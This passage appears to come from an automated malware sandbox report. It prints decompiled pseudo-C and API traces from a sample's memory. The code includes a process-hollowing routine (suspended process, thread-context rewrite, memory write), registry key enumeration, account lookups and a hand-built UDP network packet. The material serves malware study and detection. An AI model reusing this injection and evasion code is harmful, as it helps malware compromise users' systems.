				}
				_t89 = E00406DC2(_t165); // executed
				_v32 = _t89;
				_t160 = 0xe4;
				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x4122f8);
				if(_t92 != 0) {
					_t93 = E0040EE2A(_t165);
					goto L66;
				} else {
					E0040EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00406CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0040F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x61616161) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0040EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0040EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0040ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0040EF00( &_v296,  &_v295);
							_t127 = E0040ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0040EE95( &_v296,  &_v556);
						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0040ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00406CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0040F1A5(_v8) ^ 0x61616161;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E00406C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0040EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0040EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0040EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12); // executed
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20);
					L66:
					return _t93 | 0xffffffff;
				}
			}

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,73B743E0,00000000), ref: 00407472
RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,73B743E0,00000000), ref: 004074F0
RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,73B743E0,00000000), ref: 00407528
___ascii_stricmp.LIBCMT ref: 0040764D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,73B743E0,00000000), ref: 004076E7
RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,73B743E0,00000000), ref: 00407717
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,73B743E0,00000000), ref: 00407745
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,73B743E0,00000000), ref: 004077EF

Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD

GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
RegCloseKey.KERNELBASE(?), ref: 004077E6

Strings

", xrefs: 00407599

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
String ID: "
API String ID: 3433985886-123907689
Opcode ID: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
Instruction ID: 7fe5a339a68ccf6b09c70fd716338511db9c3a0a85de510e5ec7ef93542d7acc
Opcode Fuzzy Hash: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
Instruction Fuzzy Hash: 10C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1044B7F504B72D1EA78AE908B69

Uniqueness

Uniqueness Score: -1.00%

Function 0047003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0047024D

Strings

kernel32.dll, xrefs: 0047008F, 00470095
cess, xrefs: 0047018D

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 89cdb8077b1c32ad5cd6b62b13de62600a09f79638b03a87bbd100510a1c96a4
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: C1527974A01229DFDB64CF68C984BA9BBB1BF09304F1480DAE50DAB351DB34AE85DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040977C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0040977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				int _t26;
				int _t30;
				void* _t33;
				int _t39;
				int _t42;

				_t46 = __ecx;
				E0040EE2A(__ecx,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				_t26 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20); // executed
				if(_t26 != 0) {
					E0040EE2A(_t46,  &_v812, 0, 0x2cc);
					_v812.ContextFlags = 0x10002;
					_t30 = GetThreadContext(_v20.hThread,  &_v812); // executed
					if(_t30 != 0) {
						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24); // executed
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						_t39 = WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??); // executed
						if(_t39 == 0) {
							goto L3;
						}
						_v812.Eax = _v28;
						_t42 = SetThreadContext(_v20.hThread,  &_v812); // executed
						if(_t42 == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread); // executed
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}

0x0040977c
0x0040978f
0x004097a9
0x004097b1
0x004097b9
0x004097cf
0x004097e1
0x004097eb
0x004097f3
0x00409811
0x00409819
0x0040981c
0x004097f6
0x004097f9
0x00000000
0x004097f9
0x00409831
0x00409839
0x00000000
0x00000000
0x0040983e
0x0040984e
0x00409856
0x00000000
0x00000000
0x0040985b
0x00000000
0x00409863
0x004097f5
0x004097f5
0x00000000
0x004097f5
0x004097bb
0x00000000

APIs

CreateProcessA.KERNELBASE(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,004122F8), ref: 004097B1
GetThreadContext.KERNELBASE(?,?,?,?,?,?,?,004122F8), ref: 004097EB
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 004097F9
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 00409831
SetThreadContext.KERNELBASE(?,00010002,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040984E
ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040985B

Strings

D, xrefs: 004097A9

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
String ID: D
API String ID: 2981417381-2746444292
Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404280, Relevance: 7.6, APIs: 5, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404280(void* __ecx, intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t39;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E00404000(E00403ECD(_t68),  &_v20);
					if(_t38 == 0) {
						L11:
						_t39 = FindCloseChangeNotification(_v8); // executed
						_t40 = _t39 | 0xffffffff;
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {
						goto L12;
					}
					_v16 = E0040ECA5();
					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);
						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0040EBCC(_t73);
						 *_t74 = 0x61;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
							 *0x41215a =  *0x41215a + 1;
						} else {
							 *(_t74 + 8) = 1;
						}
						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0040EC2E(_t74);
						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;
						goto L12;
					}
				}
				return _t35 | 0xffffffff;
			}

0x00404280
0x00404290
0x00404296
0x0040429b
0x004042b1
0x004042ba
0x004043c1
0x004043c4
0x004043ca
0x004043cd
0x00000000
0x004043ce
0x004042c0
0x004042c3
0x004042c8
0x00000000
0x00000000
0x004042dc
0x004042e6
0x00404300
0x004043bb
0x00000000
0x00404318
0x00404322
0x0040432c
0x00404333
0x00404336
0x00404342
0x00404345
0x00404350
0x00404359
0x0040435f
0x00404366
0x00404371
0x00404375
0x00404368
0x00404368
0x00404368
0x00404384
0x0040438a
0x0040439a
0x004043ab
0x004043ae
0x004043b5
0x00000000
0x004043b5
0x00404300
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
CloseHandle.KERNEL32(00000001), ref: 004043AE

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateEvent
String ID:
API String ID: 1371578007-0
Opcode ID: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
Instruction ID: 96190e95dfac0256a72039fb05246d043f10f1ed4b28fe2ef93a25e2cd6a7057
Opcode Fuzzy Hash: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
Instruction Fuzzy Hash: D94181B1900209BADB109BA2CD45FDFBFBCEF40355F104566F604B21C1D7789A51DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004026FF, Relevance: 7.6, APIs: 5, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
				long* _t33;
				long _t35;
				long* _t36;
				long _t37;
				long _t38;
				short _t39;
				short _t40;
				char _t42;
				intOrPtr _t43;
				void* _t48;
				long* _t49;
				long* _t51;
				long* _t52;
				long* _t53;
				long* _t54;
				void* _t55;
				long* _t56;
				long* _t57;
				long* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				void* _t66;

				_t65 = __eax;
				_t33 =  *0x412bf8; // 0x0
				_t42 = 0;
				if(_t33 == 0) {
					_t33 = E0040EBCC(0x400); // executed
					_pop(_t48);
					 *0x412bf8 = _t33;
				}
				E0040EE2A(_t48, _t33, _t42, 0x400);
				_t35 = GetTickCount();
				_t49 =  *0x412bf8; // 0x0
				_t63 = __imp__#9;
				 *_t49 = _t35;
				_t36 =  *0x412bf8; // 0x0
				_t36[0] = _a12;
				_t37 =  *_t63(1);
				_t51 =  *0x412bf8; // 0x0
				_t51[1] = _t37;
				_t52 =  *0x412bf8; // 0x0
				_t38 = 0;
				_t52[1] = 0;
				_t53 =  *0x412bf8; // 0x0
				_t53[2] = 0;
				_t54 =  *0x412bf8; // 0x0
				_t54[2] = 0;
				_t60 =  *0x412bf8; // 0x0
				_t55 = 0;
				if( *_t65 != _t42) {
					do {
						_t43 =  *((intOrPtr*)(_t38 + _t65));
						_a12 = _t38;
						while(_t43 != 0) {
							if(_t43 != 0x2e) {
								_a12 = _a12 + 1;
								_t43 =  *((intOrPtr*)(_a12 + _t65));
								continue;
							}
							break;
						}
						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
						_t55 = _t55 + 1;
						while(_t38 < _a12) {
							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
							_t55 = _t55 + 1;
							_t38 = _t38 + 1;
						}
						if( *((char*)(_t38 + _t65)) == 0x2e) {
							_t38 = _t38 + 1;
						}
						_t42 = 0;
					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
				}
				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
				_t24 = _t55 + 0xd; // 0xf
				_t66 = _t24;
				_t39 =  *_t63(0xf);
				_t56 =  *0x412bf8; // 0x0
				 *((short*)(_t56 + _t66)) = _t39;
				_t40 =  *_t63(1);
				_t57 =  *0x412bf8; // 0x0
				 *((short*)(_t57 + _t66 + 2)) = _t40;
				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
				return 0 | _t40 <= 0x00000000;
			}

APIs

GetTickCount.KERNEL32 ref: 0040272E
htons.WS2_32(00000001), ref: 00402752
htons.WS2_32(0000000F), ref: 004027D5
htons.WS2_32(00000001), ref: 004027E3
sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802

Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
Part of subcall function 0040EBCC: HeapAlloc.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: htons$Heap$AllocCountProcessTicksendto
String ID:
API String ID: 1802437671-0
Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718

Uniqueness

Uniqueness Score: -1.00%

Function 00404000, Relevance: 4.5, APIs: 3, Instructions: 35
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}

APIs

CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,004122F8,004042B6,00000000,00000001,004122F8,00000000,?,004098FD), ref: 00404021
GetLastError.KERNEL32(?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 0040402C
Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404046

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CreateErrorFileLastSleep
String ID:
API String ID: 408151869-0
Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC54, Relevance: 4.5, APIs: 3, Instructions: 24
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x4136cc = _t11;
				return _t11;
			}

0x0040ec5e
0x0040ec72
0x0040ec84
0x0040ec89
0x0040ec8f

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
GetTickCount.KERNEL32 ref: 0040EC78

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Time$CountFileInformationSystemTickVolume
String ID:
API String ID: 1209300637-0
Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64

Uniqueness

Uniqueness Score: -1.00%

Function 00406E36, Relevance: 3.1, APIs: 2, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406E36(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				intOrPtr _v60;
				intOrPtr _v76;
				void _v84;
				short _v340;
				short _v860;
				int _t20;
				int _t28;
				intOrPtr _t30;
				signed int _t31;
				signed int _t32;

				_t32 = _t31 | 0xffffffff;
				_v8 = 0x104;
				_t20 = GetUserNameW( &_v860,  &_v8); // executed
				if(_t20 != 0) {
					_v8 = 0x7c;
					_v12 = 0x80;
					_t28 = LookupAccountNameW(0,  &_v860,  &_v84,  &_v8,  &_v340,  &_v12,  &_v16); // executed
					if(_t28 != 0) {
						if(_v8 < 0xc || _v76 != _a4) {
							L8:
							_t32 = 1;
						} else {
							_t30 = _a8;
							if(_t30 == 0 || _v8 >= 0x1c && _v60 == _t30) {
								_t32 = 0;
							} else {
								goto L8;
							}
						}
					}
				}
				return _t32;
			}

0x00406e4b
0x00406e4e
0x00406e55
0x00406e5d
0x00406e7f
0x00406e86
0x00406e8d
0x00406e95
0x00406e9b
0x00406ebb
0x00406ebd
0x00406ea5
0x00406ea5
0x00406eaa
0x00406eb7
0x00000000
0x00000000
0x00000000
0x00406eaa
0x00406e9b
0x00406e95
0x00406ec2

APIs

GetUserNameW.ADVAPI32(?,00401FA1), ref: 00406E55
LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,00000000,00000012), ref: 00406E8D

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Name$AccountLookupUser
String ID:
API String ID: 2370142434-0
Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
Instruction ID: d69833bf2c7126fc9b7bd4b1d5117f4fe90a033eeaed535c4400ab00b2689cfd
Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
Instruction Fuzzy Hash: 0211F776900218EBDF21CFD4C884ADFB7BCAB04741F1542B6E502F6290DB749B989BE4

Uniqueness

Uniqueness Score: -1.00%

Function 00470DF8, Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00470223,?,?), ref: 00470E02
SetErrorMode.KERNELBASE(00000000,?,?,00470223,?,?), ref: 00470E07

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f2190b15e90cccbb2c0c7e03ec915bc59ecf917ce85cf27faf79bb6eb26347d2
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 7BD0123114512CB7D7002B94DC09BCE7B1C9F05B66F008011FB0DD9181C7B4994047E9

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC2, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406DC2(void* __ecx) {
				char _v261;
				char _v264;
				long _t6;
				intOrPtr* _t10;
				int _t13;
				intOrPtr _t20;
				void* _t21;

				_t6 =  *0x412f0c; // 0x50440625
				if(_t6 == 0) {
					E0040EF00( &_v264, E00406CC9(__ecx));
					_t10 =  &_v264;
					_t21 = _t10 + 1;
					do {
						_t20 =  *_t10;
						_t10 = _t10 + 1;
					} while (_t20 != 0);
					if(_t10 - _t21 < 3) {
						L5:
						 *0x412f0c = 0x61616161;
					} else {
						_v261 = 0;
						_t13 = GetVolumeInformationA( &_v264, 0, 0, 0x412f0c, 0, 0, 0, 0); // executed
						if(_t13 == 0) {
							goto L5;
						}
					}
					_t6 =  *0x412f0c; // 0x50440625
				}
				return _t6;
			}

APIs

Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B

GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
String ID:
API String ID: 1823874839-0
Opcode ID: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
Instruction ID: 46d685041afc82653286dae93d5fe3173771f16ecf38a4b71df535c97c95e6ed
Opcode Fuzzy Hash: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
Instruction Fuzzy Hash: 55F028B9104218AFD710DB68DDC5ED777ADD704308F008476E242E3141D6B89D984B5C

Uniqueness

Uniqueness Score: -1.00%

Function 004607A6, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Module32First.KERNEL32(00000000,00000224), ref: 004607EE

Memory Dump Source

Source File: 00000024.00000002.807063493.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_460000_lagavljy.jbxd

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 1239f32995957c08f45ed2a3d9b4aaeff938c334b92bfb8aea7e0d09fa2cd5a1
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: C2F096312017116FD7203BF5988DB6FB7E8AF49766F10052AE643911C0EB78FD458E66

Uniqueness

Uniqueness Score: -1.00%

